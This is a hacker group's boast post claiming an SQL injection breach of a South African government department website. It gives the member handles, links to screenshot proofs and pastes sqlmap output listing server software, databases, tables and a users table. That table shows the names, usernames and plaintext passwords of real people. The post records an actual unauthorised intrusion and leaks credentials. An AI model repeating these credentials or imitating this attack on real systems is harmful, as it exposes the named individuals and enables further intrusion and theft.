#################################### HACKED BY TEAM T!g3R ############################################# THE DEPARMENT OF PUBLIC ENTERPRISES OF AFRICA FUCKED BY US MEMBERS : w3bd3f4c3r, n3ll@!s4mur@!, !nd!@nRuBuk, 5!l3nt k!ll3r, r00t, burn3r, ionprohaxor, s3n. WEBSITE : http://wwww.dpe.gov.za VULNERABLE : SQLi VULNERABLE LINK HIDDEN ###################################### PROOFS OF HACKS ############################################### PROOF OF DATABASE ACESSED : http://i51.tinypic.com/frs0k.png PROOF OF TABLES ACESSED : http://i54.tinypic.com/js11c2.png PROOF OF USERS DATA ACESSED : http://i51.tinypic.com/eqqopg.png ###################################### SERVER DETAILS ################################################### web server operating system: Linux Debian or Ubuntu 5.0 (lenny) web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 ################################### DAtABASE NAMES #################################################### available databases [2]: [*] dpeago_db2 [*] information_schema ######################################## TABLES NAMES ################################################ [10:44:37] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian or Ubuntu 5.0 (lenny) web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 [10:44:37] [INFO] fetching tables for database 'dpeago_db2' [10:44:37] [INFO] fetching number of tables for database 'dpeago_db2' [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 9 [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Navigation [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Survey_2008 [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': content [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': sitecontent [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': subscribers [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': tblStats [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': tempnavigation [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': tools [10:44:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': users Database: dpeago_db2 [9 tables] +----------------+ | Navigation | | Survey_2008 | | content | | sitecontent | | subscribers | | tblStats | | tempnavigation | | tools | | users | +----------------+ ######################################## USER TABLES ################################################## [10:52:10] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian or Ubuntu 5.0 (lenny) web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 [10:52:10] [INFO] fetching columns for table 'users' on database 'dpeago_db2' [10:52:10] [INFO] fetching number of columns for table 'users' on database 'dpeago_db2' [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 8 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': ID [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': FirstName [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Surname [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': UserName [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Password [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Active [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Created [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Modified [10:52:10] [INFO] fetching entries for table 'users' on database 'dpeago_db2' [10:52:10] [INFO] fetching number of entries for table 'users' on database 'dpeago_db2' [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 3 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': andrew [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Vester [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Andrew [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 2006-05-02 00:00:00 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 2006-05-02 00:00:00 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 1 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': andrew [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 1 [10:52:10] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': [10:52:34] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': [10:52:37] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': [10:52:41] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 0000-00-00 00:00:00 [10:52:41] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 0000-00-00 00:00:00 [10:52:41] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': [10:52:44] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 2 [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': tc [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Tshepo [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': Tshepo [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 2005-02-21 00:00:00 [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 2005-02-21 00:00:00 [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 1 [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': tc [10:52:48] [INFO] read from file '/pentest/database/sqlmap/output/www.dpe.gov.za/session': 5 Database: dpeago_db2 Table: users [3 entries] +--------+---------------------+-----------+----+---------------------+----------+---------+----------+ | Active | Created | FirstName | ID | Modified | Password | Surname | UserName | +--------+---------------------+-----------+----+---------------------+----------+---------+----------+ | 1 | 2006-05-02 00:00:00 | Andrew | 1 | 2006-05-02 00:00:00 | andrew | Vester | andrew | | NULL | 0000-00-00 00:00:00 | NULL | 2 | 0000-00-00 00:00:00 | NULL | NULL | NULL | | 1 | 2005-02-21 00:00:00 | Tshepo | 5 | 2005-02-21 00:00:00 | tc | Tshepo | tc | +--------+---------------------+-----------+----+---------------------+----------+---------+----------+